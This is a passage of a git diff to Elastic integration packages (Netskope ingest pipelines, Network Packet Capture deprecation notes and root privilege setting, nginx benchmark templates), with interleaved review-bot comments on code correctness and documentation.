{\"name\": \"Windows 10\"}, \"name\": \"Edge\"}}" + }, + "host": { + "hostname": "C422093" + }, + "related": { + "hosts": [ + "C422093" + ], + "ip": [ + "127.0.0.1" + ] + }, + "source": { + "geo": { + "country_iso_code": "AU" + }, + "ip": "127.0.0.1" + }, + "tags": [ + "preserve_original_event" + ], + "user": { + "email": "sandra.bourke@sunshinecoast.qld.gov.au" + }, + "user_agent": { + "device": { + "name": "Windows Device" + }, + "name": "Edge", + "os": { + "name": "Windows 10" + } + } } ] } \ No newline at end of file diff --git a/packages/netskope/data_stream/events/_dev/test/system/test-default-config.yml b/packages/netskope/data_stream/events/_dev/test/system/test-default-config.yml index 851bba8f4c6..38eaaef0e85 100644 --- a/packages/netskope/data_stream/events/_dev/test/system/test-default-config.yml +++ b/packages/netskope/data_stream/events/_dev/test/system/test-default-config.yml @@ -5,3 +5,5 @@ vars: data_stream: vars: listen_port: 9021 +assert: + hit_count: 5 diff --git a/packages/netskope/data_stream/events/agent/stream/tcp.yml.hbs b/packages/netskope/data_stream/events/agent/stream/tcp.yml.hbs index bc587e50a3a..e22fd3aa545 100644 --- a/packages/netskope/data_stream/events/agent/stream/tcp.yml.hbs +++ b/packages/netskope/data_stream/events/agent/stream/tcp.yml.hbs @@ -12,6 +12,9 @@ publisher_pipeline.disable_host: true {{#if ssl}} ssl: {{ssl}} {{/if}} +{{#if tcp_options}} +{{tcp_options}} +{{/if}} {{#if processors}} processors: {{processors}} diff --git a/packages/netskope/data_stream/events/elasticsearch/ingest_pipeline/default.yml b/packages/netskope/data_stream/events/elasticsearch/ingest_pipeline/default.yml index 46cc53f5b6b..9fe79d17d0b 100644 --- a/packages/netskope/data_stream/events/elasticsearch/ingest_pipeline/default.yml +++ b/packages/netskope/data_stream/events/elasticsearch/ingest_pipeline/default.yml 
@@ -7,7 +7,15 @@ processors: - json: field: message add_to_root: true + tag: json_message add_to_root_conflict_strategy: replace + on_failure: + - append: + field: error.message + value: >- + Processor '{{ _ingest.on_failure_processor_type }}' + {{#_ingest.on_failure_processor_tag}}with tag '{{ _ingest.on_failure_processor_tag }}' + {{/_ingest.on_failure_processor_tag}}failed with message '{{ _ingest.on_failure_message }}' - rename: field: message target_field: event.original @@ -126,6 +134,7 @@ processors: if: ctx['@timestamp'] != null && ctx['@timestamp'] != '' formats: - ISO8601 + - UNIX on_failure: - set: field: '@timestamp' @@ -1062,8 +1071,8 @@ processors: if: ctx.user?.email != null lang: painless source: >- - def parts = ctx.user.email; if (parts != null && parts.size() > 0) { - + def parts = ctx.user.email; + if (!(parts instanceof String)) { List l = new ArrayList(); for (entry in parts.entrySet()) { diff --git a/packages/netskope/data_stream/events/manifest.yml b/packages/netskope/data_stream/events/manifest.yml index c5186b4df73..d1c0c7da2ce 100644 --- a/packages/netskope/data_stream/events/manifest.yml +++ b/packages/netskope/data_stream/events/manifest.yml @@ -31,6 +31,18 @@ streams: type: bool multi: false default: false + - name: tcp_options + title: Custom TCP Options + type: yaml + description: Specify custom configuration options for the TCP input. See [TCP](https://www.elastic.co/guide/en/beats/filebeat/current/filebeat-input-tcp.html) for details. + required: false + show_user: false + multi: false + default: | + #max_message_size: 20MiB + #max_connections: 1 + #framing: delimiter + #line_delimiter: "\n" - name: processors type: yaml title: Processors diff --git a/packages/netskope/data_stream/events/sample_event.json b/packages/netskope/data_stream/events/sample_event.json index 258d1b5ea7a..ea327b4696c 100644 --- a/packages/netskope/data_stream/events/sample_event.json +++ b/packages/netskope/data_stream/events/sample_event.json 
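Review bot: The events pipeline's user.email script gets the same `if (!(parts instanceof String))` rewrite as the alerts one, and it has the same gap: a value that is neither a string nor a Map, for example a JSON list of addresses, passes the guard and then fails on `parts.entrySet()`. `if (parts instanceof Map) {` expresses the condition the `entrySet()` loop relies on and should be applied in both pipelines so they stay in step. The loop body and any error handling around it continue past the end of the hunk, so whether such a failure is swallowed or fatal is not visible here.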
@@ -1,11 +1,11 @@ { "@timestamp": "2021-12-24T00:29:56.000Z", "agent": { - "ephemeral_id": "169a2d34-f013-46a1-8cfa-0688afe7cb78", - "id": "c0ee214c-57e5-4a60-80ba-e4dc247eb02e", + "ephemeral_id": "c286de6a-2b0b-406e-89e6-ee0d2b13bd2d", + "id": "7b99f48c-6c10-4dad-86c4-ee578beef412", "name": "docker-fleet-agent", "type": "filebeat", - "version": "8.9.0" + "version": "8.0.0" }, "data_stream": { "dataset": "netskope.events", @@ -16,14 +16,14 @@ "version": "8.11.0" }, "elastic_agent": { - "id": "c0ee214c-57e5-4a60-80ba-e4dc247eb02e", + "id": "7b99f48c-6c10-4dad-86c4-ee578beef412", "snapshot": false, - "version": "8.9.0" + "version": "8.0.0" }, "event": { "agent_id_status": "verified", "dataset": "netskope.events", - "ingested": "2023-07-27T15:55:55Z" + "ingested": "2024-03-29T07:18:17Z" }, "event.id": "613ee55ec9d868fc47654a73", "input": { @@ -31,7 +31,7 @@ }, "log": { "source": { - "address": "172.18.0.4:53214" + "address": "192.168.224.6:57252" } }, "netskope": { @@ -56,4 +56,4 @@ "forwarded", "netskope-events" ] -} +} \ No newline at end of file diff --git a/packages/netskope/docs/README.md b/packages/netskope/docs/README.md index fd79073374b..58eba436dfa 100644 --- a/packages/netskope/docs/README.md +++ b/packages/netskope/docs/README.md @@ -583,11 +583,11 @@ An example event for `alerts` looks as following: { "@timestamp": "2021-12-23T16:27:09.000Z", "agent": { - "ephemeral_id": "f351413b-f36f-45a3-aa1f-1334e718f39a", - "id": "c0ee214c-57e5-4a60-80ba-e4dc247eb02e", + "ephemeral_id": "275c19c7-0f2c-467b-850f-c153e4a77147", + "id": "7b99f48c-6c10-4dad-86c4-ee578beef412", "name": "docker-fleet-agent", "type": "filebeat", - "version": "8.9.0" + "version": "8.0.0" }, "data_stream": { "dataset": "netskope.alerts", 
@@ -614,14 +614,14 @@ An example event for `alerts` looks as following: "version": "8.11.0" }, "elastic_agent": { - "id": "c0ee214c-57e5-4a60-80ba-e4dc247eb02e", + "id": "7b99f48c-6c10-4dad-86c4-ee578beef412", "snapshot": false, - "version": "8.9.0" + "version": "8.0.0" }, "event": { "agent_id_status": "verified", "id": "f621f259f5fbde850ad5593a", - "ingested": "2023-07-27T15:55:05Z" + "ingested": "2024-03-29T07:17:15Z" }, "file": { "hash": { @@ -638,7 +638,7 @@ An example event for `alerts` looks as following: }, "log": { "source": { - "address": "172.18.0.4:33326" + "address": "192.168.224.6:60788" } }, "netskope": { @@ -760,7 +760,6 @@ An example event for `alerts` looks as following: } } } - ``` ### Events @@ -1181,11 +1180,11 @@ An example event for `events` looks as following: { "@timestamp": "2021-12-24T00:29:56.000Z", "agent": { - "ephemeral_id": "169a2d34-f013-46a1-8cfa-0688afe7cb78", - "id": "c0ee214c-57e5-4a60-80ba-e4dc247eb02e", + "ephemeral_id": "c286de6a-2b0b-406e-89e6-ee0d2b13bd2d", + "id": "7b99f48c-6c10-4dad-86c4-ee578beef412", "name": "docker-fleet-agent", "type": "filebeat", - "version": "8.9.0" + "version": "8.0.0" }, "data_stream": { "dataset": "netskope.events", @@ -1196,14 +1195,14 @@ An example event for `events` looks as following: "version": "8.11.0" }, "elastic_agent": { - "id": "c0ee214c-57e5-4a60-80ba-e4dc247eb02e", + "id": "7b99f48c-6c10-4dad-86c4-ee578beef412", "snapshot": false, - "version": "8.9.0" + "version": "8.0.0" }, "event": { "agent_id_status": "verified", "dataset": "netskope.events", - "ingested": "2023-07-27T15:55:55Z" + "ingested": "2024-03-29T07:18:17Z" }, "event.id": "613ee55ec9d868fc47654a73", "input": { @@ -1211,7 +1210,7 @@ An example event for `events` looks as following: }, "log": { "source": { - "address": "172.18.0.4:53214" + "address": "192.168.224.6:57252" } }, "netskope": { @@ -1237,5 +1236,4 @@ An example event for `events` looks as following: "netskope-events" ] } - ``` \ No newline at end of file 
diff --git a/packages/netskope/manifest.yml b/packages/netskope/manifest.yml index d29da8884c8..1a11db082cb 100644 --- a/packages/netskope/manifest.yml +++ b/packages/netskope/manifest.yml @@ -1,7 +1,7 @@ -format_version: "3.0.0" +format_version: "3.0.3" name: netskope title: "Netskope" -version: "1.16.1" +version: "1.18.0" description: Collect logs from Netskope with Elastic Agent. type: integration categories: @@ -9,7 +9,7 @@ categories: - network conditions: kibana: - version: ^7.17.0 || ^8.0.0 + version: ^8.7.0 screenshots: - src: /img/netskope-alerts-screenshot.png title: Netskope Alert logs screenshot diff --git a/packages/network_traffic/_dev/build/docs/README.md b/packages/network_traffic/_dev/build/docs/README.md index e5bd6260639..864980719b3 100644 --- a/packages/network_traffic/_dev/build/docs/README.md +++ b/packages/network_traffic/_dev/build/docs/README.md 
@@ -33,6 +33,29 @@ Currently, Network Packet Capture supports the following protocols: The following options are available for all protocols: +#### `map_to_ecs` + +Remap any non-ECS Packetbeat fields in root to their correct ECS fields. +This will rename fields that are moved so the fields will not be present +at the root of the document and so any rules that depend on the fields +will need to be updated. + +The legacy behaviour of this option is to not remap to ECS. This behaviour +is still the default, but is deprecated and users are encouraged to set +this option to true. + +ECS remapping may have an impact on workflows that depend on the identity +of non-ECS fields, and users should assess their use of these fields before +making the change. Users who need to retain data collected with the legacy +mappings may need to re-index their older documents. Instructions for doing +this are available [here](https://www.elastic.co/guide/en/elasticsearch/reference/current/docs-reindex.html). +The pipeline used to perform ECS remapping for each data stream can be found +in `Stack Management`›`Ingest Pipelines` and and searching for +"logs-network_traffic compatibility". + +The deprecation and retirement timeline for legacy behavior is available +[here](https://github.com/elastic/integrations/issues/8185). + #### `enabled` The enabled setting is a boolean setting to enable or disable protocols diff --git a/packages/network_traffic/changelog.yml b/packages/network_traffic/changelog.yml index e6a1f1ab0a3..c41824af286 100644 --- a/packages/network_traffic/changelog.yml +++ b/packages/network_traffic/changelog.yml 
@@ -1,4 +1,14 @@ # newer versions go on top +- version: "1.30.1" + changes: + - description: capture root requirement + type: enhancement + link: https://github.com/elastic/integrations/issues/8647 +- version: "1.30.0" + changes: + - description: Publish deprecation notice for legacy behavior of `map_to_ecs`. + type: enhancement + link: https://github.com/elastic/integrations/pull/9031 - version: "1.29.1" changes: - description: Changed owners diff --git a/packages/network_traffic/data_stream/amqp/manifest.yml b/packages/network_traffic/data_stream/amqp/manifest.yml index a8721a68253..0bb2d7afa49 100644 --- a/packages/network_traffic/data_stream/amqp/manifest.yml +++ b/packages/network_traffic/data_stream/amqp/manifest.yml @@ -124,7 +124,10 @@ streams: This will rename fields that are moved so the fields will not be present at the root of the document and so any rules that depend on the fields will need to be updated. - show_user: false + + The legacy behaviour of this option is deprecated and users are encouraged + to set this option to true. See details in the [package overview describing `map_to_ecs`](../../../integrations/detail/network_traffic/overview). + show_user: true multi: false required: false title: AMQP diff --git a/packages/network_traffic/data_stream/cassandra/manifest.yml b/packages/network_traffic/data_stream/cassandra/manifest.yml index 9b3554b06fc..7ba1ff6cc6d 100644 --- a/packages/network_traffic/data_stream/cassandra/manifest.yml +++ b/packages/network_traffic/data_stream/cassandra/manifest.yml 
@@ -111,7 +111,10 @@ streams: This will rename fields that are moved so the fields will not be present at the root of the document and so any rules that depend on the fields will need to be updated. - show_user: false + + The legacy behaviour of this option is deprecated and users are encouraged + to set this option to true. See details in the [package overview describing `map_to_ecs`](../../../integrations/detail/network_traffic/overview). + show_user: true multi: false required: false title: Cassandra diff --git a/packages/network_traffic/data_stream/dhcpv4/manifest.yml b/packages/network_traffic/data_stream/dhcpv4/manifest.yml index 46aea6f0684..1aa7607adf5 100644 --- a/packages/network_traffic/data_stream/dhcpv4/manifest.yml +++ b/packages/network_traffic/data_stream/dhcpv4/manifest.yml @@ -59,7 +59,10 @@ streams: This will rename fields that are moved so the fields will not be present at the root of the document and so any rules that depend on the fields will need to be updated. - show_user: false + + The legacy behaviour of this option is deprecated and users are encouraged + to set this option to true. See details in the [package overview describing `map_to_ecs`](../../../integrations/detail/network_traffic/overview). + show_user: true multi: false required: false title: DHCP diff --git a/packages/network_traffic/data_stream/dns/manifest.yml b/packages/network_traffic/data_stream/dns/manifest.yml index caadb359a66..c8f5a2f50de 100644 --- a/packages/network_traffic/data_stream/dns/manifest.yml +++ b/packages/network_traffic/data_stream/dns/manifest.yml 
@@ -114,7 +114,10 @@ streams: This will rename fields that are moved so the fields will not be present at the root of the document and so any rules that depend on the fields will need to be updated. - show_user: false + + The legacy behaviour of this option is deprecated and users are encouraged + to set this option to true. See details in the [package overview describing `map_to_ecs`](../../../integrations/detail/network_traffic/overview). + show_user: true multi: false required: false title: DNS diff --git a/packages/network_traffic/data_stream/flow/manifest.yml b/packages/network_traffic/data_stream/flow/manifest.yml index bf4eb4f9bb5..ed73beef964 100644 --- a/packages/network_traffic/data_stream/flow/manifest.yml +++ b/packages/network_traffic/data_stream/flow/manifest.yml @@ -59,6 +59,9 @@ streams: This will rename fields that are moved so the fields will not be present at the root of the document and so any rules that depend on the fields will need to be updated. - show_user: false + + The legacy behaviour of this option is deprecated and users are encouraged + to set this option to true. See details in the [package overview describing `map_to_ecs`](../../../integrations/detail/network_traffic/overview). + show_user: true multi: false required: false diff --git a/packages/network_traffic/data_stream/http/manifest.yml b/packages/network_traffic/data_stream/http/manifest.yml index 708fb50f69a..2ad867128c8 100644 --- a/packages/network_traffic/data_stream/http/manifest.yml +++ b/packages/network_traffic/data_stream/http/manifest.yml 
@@ -184,7 +184,10 @@ streams: This will rename fields that are moved so the fields will not be present at the root of the document and so any rules that depend on the fields will need to be updated. - show_user: false + + The legacy behaviour of this option is deprecated and users are encouraged + to set this option to true. See details in the [package overview describing `map_to_ecs`](../../../integrations/detail/network_traffic/overview). + show_user: true multi: false required: false title: HTTP diff --git a/packages/network_traffic/data_stream/icmp/manifest.yml b/packages/network_traffic/data_stream/icmp/manifest.yml index 7a258eec387..5476bf1833d 100644 --- a/packages/network_traffic/data_stream/icmp/manifest.yml +++ b/packages/network_traffic/data_stream/icmp/manifest.yml @@ -52,6 +52,9 @@ streams: This will rename fields that are moved so the fields will not be present at the root of the document and so any rules that depend on the fields will need to be updated. - show_user: false + + The legacy behaviour of this option is deprecated and users are encouraged + to set this option to true. See details in the [package overview describing `map_to_ecs`](../../../integrations/detail/network_traffic/overview). + show_user: true multi: false required: false diff --git a/packages/network_traffic/data_stream/memcached/manifest.yml b/packages/network_traffic/data_stream/memcached/manifest.yml index 584822fae63..8bb55cbbbce 100644 --- a/packages/network_traffic/data_stream/memcached/manifest.yml +++ b/packages/network_traffic/data_stream/memcached/manifest.yml 
@@ -135,7 +135,10 @@ streams: This will rename fields that are moved so the fields will not be present at the root of the document and so any rules that depend on the fields will need to be updated. - show_user: false + + The legacy behaviour of this option is deprecated and users are encouraged + to set this option to true. See details in the [package overview describing `map_to_ecs`](../../../integrations/detail/network_traffic/overview). + show_user: true multi: false required: false title: Memcached diff --git a/packages/network_traffic/data_stream/mongodb/manifest.yml b/packages/network_traffic/data_stream/mongodb/manifest.yml index 66ba27d1b2b..0ac427c7089 100644 --- a/packages/network_traffic/data_stream/mongodb/manifest.yml +++ b/packages/network_traffic/data_stream/mongodb/manifest.yml @@ -105,7 +105,10 @@ streams: This will rename fields that are moved so the fields will not be present at the root of the document and so any rules that depend on the fields will need to be updated. - show_user: false + + The legacy behaviour of this option is deprecated and users are encouraged + to set this option to true. See details in the [package overview describing `map_to_ecs`](../../../integrations/detail/network_traffic/overview). + show_user: true multi: false required: false title: MongoDB diff --git a/packages/network_traffic/data_stream/mysql/manifest.yml b/packages/network_traffic/data_stream/mysql/manifest.yml index b2ad8e537c4..e6de4480a9b 100644 --- a/packages/network_traffic/data_stream/mysql/manifest.yml +++ b/packages/network_traffic/data_stream/mysql/manifest.yml 
@@ -86,7 +86,10 @@ streams: This will rename fields that are moved so the fields will not be present at the root of the document and so any rules that depend on the fields will need to be updated. - show_user: false + + The legacy behaviour of this option is deprecated and users are encouraged + to set this option to true. See details in the [package overview describing `map_to_ecs`](../../../integrations/detail/network_traffic/overview). + show_user: true multi: false required: false title: MySQL diff --git a/packages/network_traffic/data_stream/nfs/manifest.yml b/packages/network_traffic/data_stream/nfs/manifest.yml index 97692125db2..279a6783ba6 100644 --- a/packages/network_traffic/data_stream/nfs/manifest.yml +++ b/packages/network_traffic/data_stream/nfs/manifest.yml @@ -86,7 +86,10 @@ streams: This will rename fields that are moved so the fields will not be present at the root of the document and so any rules that depend on the fields will need to be updated. - show_user: false + + The legacy behaviour of this option is deprecated and users are encouraged + to set this option to true. See details in the [package overview describing `map_to_ecs`](../../../integrations/detail/network_traffic/overview). + show_user: true multi: false required: false title: NFS diff --git a/packages/network_traffic/data_stream/pgsql/manifest.yml b/packages/network_traffic/data_stream/pgsql/manifest.yml index 242081c33b7..4d03ad0cdb8 100644 --- a/packages/network_traffic/data_stream/pgsql/manifest.yml +++ b/packages/network_traffic/data_stream/pgsql/manifest.yml 
@@ -86,7 +86,10 @@ streams: This will rename fields that are moved so the fields will not be present at the root of the document and so any rules that depend on the fields will need to be updated. - show_user: false + + The legacy behaviour of this option is deprecated and users are encouraged + to set this option to true. See details in the [package overview describing `map_to_ecs`](../../../integrations/detail/network_traffic/overview). + show_user: true multi: false required: false title: PostgreSQL diff --git a/packages/network_traffic/data_stream/redis/manifest.yml b/packages/network_traffic/data_stream/redis/manifest.yml index be1e895849f..b8d8042e004 100644 --- a/packages/network_traffic/data_stream/redis/manifest.yml +++ b/packages/network_traffic/data_stream/redis/manifest.yml @@ -105,7 +105,10 @@ streams: This will rename fields that are moved so the fields will not be present at the root of the document and so any rules that depend on the fields will need to be updated. - show_user: false + + The legacy behaviour of this option is deprecated and users are encouraged + to set this option to true. See details in the [package overview describing `map_to_ecs`](../../../integrations/detail/network_traffic/overview). + show_user: true multi: false required: false title: Redis diff --git a/packages/network_traffic/data_stream/sip/manifest.yml b/packages/network_traffic/data_stream/sip/manifest.yml index 58f8f685d8f..d465123ed08 100644 --- a/packages/network_traffic/data_stream/sip/manifest.yml +++ b/packages/network_traffic/data_stream/sip/manifest.yml 
@@ -80,7 +80,10 @@ streams: This will rename fields that are moved so the fields will not be present at the root of the document and so any rules that depend on the fields will need to be updated. - show_user: false + + The legacy behaviour of this option is deprecated and users are encouraged + to set this option to true. See details in the [package overview describing `map_to_ecs`](../../../integrations/detail/network_traffic/overview). + show_user: true multi: false required: false title: SIP diff --git a/packages/network_traffic/data_stream/thrift/manifest.yml b/packages/network_traffic/data_stream/thrift/manifest.yml index b0d8cbc3b39..e233a99a875 100644 --- a/packages/network_traffic/data_stream/thrift/manifest.yml +++ b/packages/network_traffic/data_stream/thrift/manifest.yml @@ -160,7 +160,10 @@ streams: This will rename fields that are moved so the fields will not be present at the root of the document and so any rules that depend on the fields will need to be updated. - show_user: false + + The legacy behaviour of this option is deprecated and users are encouraged + to set this option to true. See details in the [package overview describing `map_to_ecs`](../../../integrations/detail/network_traffic/overview). + show_user: true multi: false required: false title: Thrift diff --git a/packages/network_traffic/data_stream/tls/manifest.yml b/packages/network_traffic/data_stream/tls/manifest.yml index 749518b66d1..4eaebadfca0 100644 --- a/packages/network_traffic/data_stream/tls/manifest.yml +++ b/packages/network_traffic/data_stream/tls/manifest.yml 
@@ -86,7 +86,10 @@ streams: This will rename fields that are moved so the fields will not be present at the root of the document and so any rules that depend on the fields will need to be updated. - show_user: false + + The legacy behaviour of this option is deprecated and users are encouraged + to set this option to true. See details in the [package overview describing `map_to_ecs`](../../../integrations/detail/network_traffic/overview). + show_user: true multi: false required: false title: TLS diff --git a/packages/network_traffic/docs/README.md b/packages/network_traffic/docs/README.md index 304c1261b2b..da835c26c57 100644 --- a/packages/network_traffic/docs/README.md +++ b/packages/network_traffic/docs/README.md 
@@ -33,6 +33,29 @@ Currently, Network Packet Capture supports the following protocols: The following options are available for all protocols: +#### `map_to_ecs` + +Remap any non-ECS Packetbeat fields in root to their correct ECS fields. +This will rename fields that are moved so the fields will not be present +at the root of the document and so any rules that depend on the fields +will need to be updated. + +The legacy behaviour of this option is to not remap to ECS. This behaviour +is still the default, but is deprecated and users are encouraged to set +this option to true. + +ECS remapping may have an impact on workflows that depend on the identity +of non-ECS fields, and users should assess their use of these fields before +making the change. Users who need to retain data collected with the legacy +mappings may need to re-index their older documents. Instructions for doing +this are available [here](https://www.elastic.co/guide/en/elasticsearch/reference/current/docs-reindex.html). +The pipeline used to perform ECS remapping for each data stream can be found +in `Stack Management`›`Ingest Pipelines` and and searching for +"logs-network_traffic compatibility". + +The deprecation and retirement timeline for legacy behavior is available +[here](https://github.com/elastic/integrations/issues/8185). + #### `enabled` The enabled setting is a boolean setting to enable or disable protocols diff --git a/packages/network_traffic/manifest.yml b/packages/network_traffic/manifest.yml index f3679ee44f2..c7445f38d19 100644 --- a/packages/network_traffic/manifest.yml +++ b/packages/network_traffic/manifest.yml @@ -1,7 +1,7 @@ format_version: "3.0.0" name: network_traffic title: Network Packet Capture -version: "1.29.1" +version: "1.30.1" description: Capture and analyze network traffic from a host with Elastic Agent. type: integration categories: 
@@ -40,6 +40,9 @@ policy_templates: required: false show_user: false default: false +agent: + privileges: + root: true owner: github: elastic/sec-linux-platform type: elastic diff --git a/packages/nginx/_dev/benchmark/rally/access-benchmark.yml b/packages/nginx/_dev/benchmark/rally/access-benchmark.yml new file mode 100644 index 00000000000..371dc013ab8 --- /dev/null +++ b/packages/nginx/_dev/benchmark/rally/access-benchmark.yml @@ -0,0 +1,14 @@ +--- +description: Benchmark 20000 nginx.access events ingested +data_stream: + name: access +corpora: + generator: + total_events: 20000 + template: + type: gotext + path: ./access-benchmark/template.ndjson + config: + path: ./access-benchmark/config.yml + fields: + path: ./access-benchmark/fields.yml diff --git a/packages/nginx/_dev/benchmark/rally/access-benchmark/config.yml b/packages/nginx/_dev/benchmark/rally/access-benchmark/config.yml new file mode 100644 index 00000000000..7145fd28d6c --- /dev/null +++ b/packages/nginx/_dev/benchmark/rally/access-benchmark/config.yml @@ -0,0 +1,17 @@ +fields: + - name: 'timestamp' + period: -24h # one day + - name: agent.id + value: "ef5e274d-4b53-45e6-943a-a5bcf1a6f523" + - name: request_method + enum: ["GET", "POST", "PUT", "DELETE"] + - name: status_code + enum: ["101", "102", "200", "201", "202", "300", "301", "302", "400", "401", "402", "500", "501"] + - name: response_bytes + range: + min: 100 + max: 30000 + - name: id + enum: ["1", "2", "3"] + - name: domains + enum: [".com", ".net", ".info", ".org"] diff --git a/packages/nginx/_dev/benchmark/rally/access-benchmark/fields.yml b/packages/nginx/_dev/benchmark/rally/access-benchmark/fields.yml new file mode 100644 index 00000000000..d06f16fd934 --- /dev/null +++ b/packages/nginx/_dev/benchmark/rally/access-benchmark/fields.yml 
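Review bot: `agent.privileges.root: true` raises the privilege level of every agent policy that includes this package, yet the README changes in this commit do not mention the requirement or the reason for it, and the changelog entry only says "capture root requirement". A sentence in the package docs such as `Network Packet Capture requires Elastic Agent to run as root so that it can open raw sockets for packet capture.` would let operators assess the change before upgrading. If the package spec offers a narrower capability declaration than full root, that would be preferable from a least-privilege standpoint; I cannot tell from this diff whether it does.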
@@ -0,0 +1,25 @@ +- name: agent.ephemeral_id + type: keyword +- name: agent.id + type: keyword +- name: agent.name + type: keyword +- name: destination_domain + type: keyword + example: lessons.example +- name: domains + type: keyword +- name: remote_ip + type: ip +- name: timestamp + type: date +- name: request_method + type: keyword +- name: status_code + type: keyword +- name: response_bytes + type: long +- name: remote_user + type: keyword +- name: id + type: keyword diff --git a/packages/nginx/_dev/benchmark/rally/access-benchmark/template.ndjson b/packages/nginx/_dev/benchmark/rally/access-benchmark/template.ndjson new file mode 100644 index 00000000000..80322c2f0fa --- /dev/null +++ b/packages/nginx/_dev/benchmark/rally/access-benchmark/template.ndjson 
@@ -0,0 +1,75 @@ +{{- $timestamp := generate "timestamp" }} +{{- $agentId := generate "agent.id" }} +{{- $agentName := generate "agent.name" }} +{{- $agentEphemeralid := generate "agent.ephemeral_id" }} +{{- $destinationDomain := generate "destination_domain" }} +{{- $remoteIp := generate "remote_ip" }} +{{- $remoteUser := generate "remote_user" }} +{{- $requestMethod := generate "request_method" }} +{{- $statusCode := generate "status_code" }} +{{- $responseBytes := generate "response_bytes" }} +{{- $domains := generate "domains" }} +{{- $id := generate "id" }} +{ + "@timestamp": "{{ $timestamp.Format "2006-01-02T15:04:05.000Z07:00" }}", + "agent": { + "ephemeral_id": "{{ $agentEphemeralid }}", + "id": "{{ $agentId }}", + "name": "{{ $agentName }}", + "type": "filebeat", + "version": "8.5.1" + }, + "data_stream": { + "dataset": "nginx.access", + "namespace": "ep", + "type": "logs" + }, + "ecs": { + "version": "8.5.1" + }, + "elastic_agent": { + "id": "{{ $agentId }}", + "snapshot": false, + "version": "8.5.0" + }, + "message": "{{ $destinationDomain }}{{ $domains }}:80 {{ $remoteIp }} - {{ $remoteUser }} [{{$timestamp | date "02/Jan/2006:15:04:05"}} {{ $timestamp.Format "Z0700" }}] \"{{$requestMethod}} /downloads/product_{{ $id }} HTTP/1.1\" {{ $statusCode }} {{ $responseBytes }} \"http://localhost:8080/\" \"Chef Client/12.0.3 (ruby-2.1.4-p265; ohai-8.0.1; x86_64-linux; +http://opscode.com)\"", + "event": { + "agent_id_status": "verified", + "dataset": "nginx.access", + "timezone": "{{ $timestamp.Format "-07:00" }}" + }, + "host": { + "architecture": "x86_64", + "containerized": false, + "hostname": "docker-fleet-agent", + "id": "66392b0697b84641af8006d87aeb89f1", + "ip": [ + "172.18.0.7" + ], + "mac": [ + "02-42-AC-12-00-07" + ], + "name": "docker-fleet-agent", + "os": { + "codename": "focal", + "family": "debian", + "kernel": "5.15.49-linuxkit", + "name": "Ubuntu", + "platform": "ubuntu", + "type": "linux", + "version": "20.04.5 LTS (Focal Fossa)" + } + }, + 
"input": { + "type": "log" + }, + "log": { + "file": { + "path": "/tmp/service_logs/access.log" + }, + "offset": 0 + }, + "tags": [ + "nginx-access" + ] +} \ No newline at end of file diff --git a/packages/nginx/_dev/benchmark/rally/error-benchmark/config.yml b/packages/nginx/_dev/benchmark/rally/error-benchmark/config.yml index 1ccf19deb89..70472b8a4e4 100644 --- a/packages/nginx/_dev/benchmark/rally/error-benchmark/config.yml +++ b/packages/nginx/_dev/benchmark/rally/error-benchmark/config.yml @@ -17,3 +17,18 @@ fields: range: min: 1 max: 100000 + - name: request.method + enum: ["POST", "GET", "PUT", "DELETE"] + - name: request.path + enum: + - "/favicon.ico" + - "/index.html" + - "/foo/bar.php" + - name: referer.host.name + enum: + - "localhost" + - "google.com" + - name: host.name + enum: + - "localhost" + - "elastic.co" \ No newline at end of file diff --git a/packages/nginx/_dev/benchmark/rally/error-benchmark/fields.yml b/packages/nginx/_dev/benchmark/rally/error-benchmark/fields.yml index 990f7d91ace..dc271723bec 100644 --- a/packages/nginx/_dev/benchmark/rally/error-benchmark/fields.yml +++ b/packages/nginx/_dev/benchmark/rally/error-benchmark/fields.yml @@ -1,5 +1,3 @@ -- name: agent.ephemeral_id - type: keyword - name: agent.ephemeral_id type: keyword - name: agent.id @@ -8,8 +6,6 @@ type: keyword - name: agent.version type: keyword -- name: agent.version - type: keyword - name: connection_id type: long - name: host.ip @@ -26,3 +22,9 @@ type: long - name: timestamp type: date +- name: request.method + type: keyword +- name: request.path + type: keyword +- name: referer.host.name + type: keyword \ No newline at end of file diff --git a/packages/nginx/_dev/benchmark/rally/error-benchmark/template.ndjson b/packages/nginx/_dev/benchmark/rally/error-benchmark/template.ndjson index b8e9abf98fa..57f705c9c5a 100644 --- a/packages/nginx/_dev/benchmark/rally/error-benchmark/template.ndjson +++ b/packages/nginx/_dev/benchmark/rally/error-benchmark/template.ndjson 
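Review bot: The error-benchmark `config.yml` hunk adds an enum for `host.name`, but the matching `fields.yml` hunk declares only `request.method`, `request.path` and `referer.host.name`; unless `host.name` is already declared above the hunk (only `host.ip` is visible in the context), the generator has no type for it and `{{ generate "host.name" }}` in the template may fail or yield an untyped value. Adding `- name: host.name` followed by `  type: keyword` to fields.yml would keep the three files consistent. The same check applies to the new access-benchmark set, where fields.yml declares `agent.ephemeral_id`, `agent.name`, `destination_domain`, `remote_ip` and `remote_user` with no matching entry in config.yml — presumably intentional so they receive generated values, but worth confirming.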
@@ -7,6 +7,7 @@ {{- $pid := generate "process.pid" }} {{- $threadId := generate "thread.id" }} {{- $connectionId := generate "connection_id" }} +{{- $requestPath := generate "request.path" }} { "@timestamp": "{{ $timestamp.Format "2006-01-02T15:04:05.000Z" }}", "agent": { @@ -65,7 +66,7 @@ }, "offset": 0 }, - "message": "{{$timestamp.Format "2006/01/02 15:04:05"}} [{{ $logLevel }}] {{ $pid }}#{{ $threadId }}: *{{ $connectionId }} {{generate "message"}}", + "message": "{{$timestamp.Format "2006/01/02 15:04:05"}} [{{ $logLevel }}] {{ $pid }}#{{ $threadId }}: *{{ $connectionId }} open() \"/usr/local/Cellar/nginx/1.10.2_1/html{{ $requestPath }}\" failed (2: No such file or directory), client: 127.0.0.1, server: localhost, request: \"{{ generate "request.method" }} {{ $requestPath }} HTTP/1.1\", host: \"{{ generate "host.name" }}:8080\", referrer: \"http://{{ generate "referer.host.name" }}:8080/\"", "tags": [ "nginx-error" ] diff --git a/packages/nginx/_dev/benchmark/rally/stubstatus-benchmark/config.yml b/packages/nginx/_dev/benchmark/rally/stubstatus-benchmark/config.yml index 7348b24a08e..2990d6b9823 100644 --- a/packages/nginx/_dev/benchmark/rally/stubstatus-benchmark/config.yml +++ b/packages/nginx/_dev/benchmark/rally/stubstatus-benchmark/config.yml @@ -4,7 +4,7 @@ fields: - name: agent.id value: "ef5e274d-4b53-45e6-943a-a5bcf1a6f523" - name: service.address - enum: ["elastic-package-service-nginx-1","elastic-package-service-nginx-2","elastic-package-service-nginx-3"] + enum: ["elastic-package-service-nginx-1", "elastic-package-service-nginx-2", 